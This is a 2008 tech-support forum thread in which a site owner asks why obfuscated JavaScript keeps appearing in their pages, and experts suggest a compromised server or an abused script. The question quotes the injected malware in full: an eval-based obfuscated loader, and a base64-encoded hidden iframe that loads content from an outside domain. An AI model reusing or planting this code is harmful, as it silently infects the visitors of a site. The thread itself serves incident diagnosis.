Solved

Injecting Javascript code in webpage after body tag. which download maliculous script into system

Posted on 2008-10-13
8
1,301 Views
Last Modified: 2013-11-16
I don't know what's happening with my web server and websites. Somebody injecting some javascript code into the webpages after the body tag. When someone try to open the websiet it downloads the scripts and inject into the system. I tried to delete all hosted website and uploaded it again but no luck.
Could someone suggest me on this....
Here is the sample code of that javascript : -
<script language=JavaScript> function aiwpbn15(p){var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,4,50,23,48,53,51,42,20,49,0,0,0,0,0,0,44,54,58,19,27,10,37,2,18,13,39,40,22,12,56,29,14,41,30,61,11,33,21,34,3,16,5,0,0,0,0,38,0,62,9,47,28,31,25,43,32,36,7,8,6,35,15,17,1,0,45,26,60,59,46,52,57,55,24);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(174^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}aiwpbn15('feM4EjdAqArAngSAOnfW7jM4TJzFEjd6Dnt2qgIhf6S9sc@UbEx9k6S6Xc@mq0t4TnbJRWMJIuzydytiMs@AsuIFplN6EgthIjM4scM4snk6Gjd6ZXk4TgOhsjzibLNNngr9q2O4DX@2lPa6sDMhd0M4Ejt4lRkUOWQJLBxUZ_kJRWMJIJzUb2Kmfe@2sDtisvxJPst2jJ@9snQFRBzyser4TnbmEedyRTt63Cb4pXt2MGQipRM2d0t4TXfWjG')	</script><!-- makemecharming.com --><script type="text/javascript">
eval("function _g_u(t){var k='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o='';var q,w,e;var a,s,d,f;var i=0;do{a = k.indexOf(t.charAt(i++));s=k.indexOf(t.charAt(i++));d=k.indexOf(t.charAt(i++));f=k.indexOf(t.charAt(i++));q=(a << 2) | (s >> 4);w=((s & 15) << 4) | (d >> 2);e=((d & 3) << 6) | f;o=o+String.fromCharCode(q);if(d!=64) o=o+String.fromCharCode(w); if(f!=64) o=o+String.fromCharCode(e);} while(i<t.length);document.write(o);};_g_u('PElGUkFNRSBTUkM9Imh0dHA6Ly90cmFmZmEuaW5mby9pbWcvc3R5bGUvc3R5bGUucGhwIiBXSURUSD0wIEhFSUdIVD0wPjwvSUZSQU1FPg==');");
</script>

Open in new window

0
Comment
Question by:itindia
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 2
  • 2
  • 2
  • +1
8 Comments
 
LVL 21

Expert Comment

by:silemone
ID: 22702413
when you say someone, you mean your webhost or another programmer?
0
 

Author Comment

by:itindia
ID: 22702461
Thanks for the quick reply!! But I don't know who is the culprit as i am the only person who has the access of the websites, i meant by "Someone" that there could be a Hijacker or may me some virus who has attacked on my websites.
0
 
LVL 23

Accepted Solution

by:
Tony McCreath earned 63 total points
ID: 23103305
Is the injected code directly in an html file on the server? i.e. is it being directly changed on the server.

It could be related to the iframe attach...

http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml

Its initially based onfinding a password to access to the server. From there it alters website pages to do bad things.

0
When ransomware hits your clients, what do you do?

MSPs: Endpoint security isn’t enough to prevent ransomware.
As the impact and severity of crypto ransomware attacks has grown, Webroot fought back, not just by building a next-gen endpoint solution capable of preventing ransomware attacks but also by being a thought leader.

 
LVL 7

Assisted Solution

by:DrAtomic
DrAtomic earned 62 total points
ID: 23371507
0
 

Author Comment

by:itindia
ID: 23371693
yes Tiggerito Its directly injected on the server, no user modification has been done. Its spreading the code in all HTMl, ASP and PHP files located in the server in which the  tag is exists. Basically its a virus, If someone opens the website that code execute and pointed to another URL and make your PC un-responding.

No way you can stop it but to press ESC before executing or you have to do a system restore.

I keep removing the codes from files but after some days the same thing will happen.

0
 
LVL 23

Expert Comment

by:Tony McCreath
ID: 23381528
If it is actual files on the server that are being modified then I suspect someone or something has acquired access to your server.

You will need to close the hole that keeps letting them in, and clean up the system from any hacks or viruses.



0
 
LVL 7

Expert Comment

by:DrAtomic
ID: 23383001
Most likely your server isn't compromised but one of your scripts is being abused, the abused script will have access to all files under the same user account. Start by giving each domain it's own user and isolate the abused website that way, unless you are 100% sure that it's being done on the server itself then apply Tiggerito his suggestion.
0

Featured Post

Automating Your MSP Business

The road to profitability.
Delivering superior services is key to ensuring customer satisfaction and the consequent long-term relationships that enable MSPs to lock in predictable, recurring revenue. What's the best way to deliver superior service? One word: automation.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

This article discusses how to create an extensible mechanism for linked drop downs.
When crafting your “Why Us” page, there are a plethora of pitfalls to avoid. Follow these five tips, and you’ll be well on your way to creating an effective page.
In this Micro Tutorial viewers will learn how to create navigation buttons that change on rollover, using CSS (Continuation of the CSS Image Sprite tutorial) Create a parent ID for all the list items       - Specify position: absolute and display: block…
Learn how to create flexible layouts using relative units in CSS.  New relative units added in CSS3 include vw(viewports width), vh(viewports height), vmin(minimum of viewports height and width), and vmax (maximum of viewports height and width).

717 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question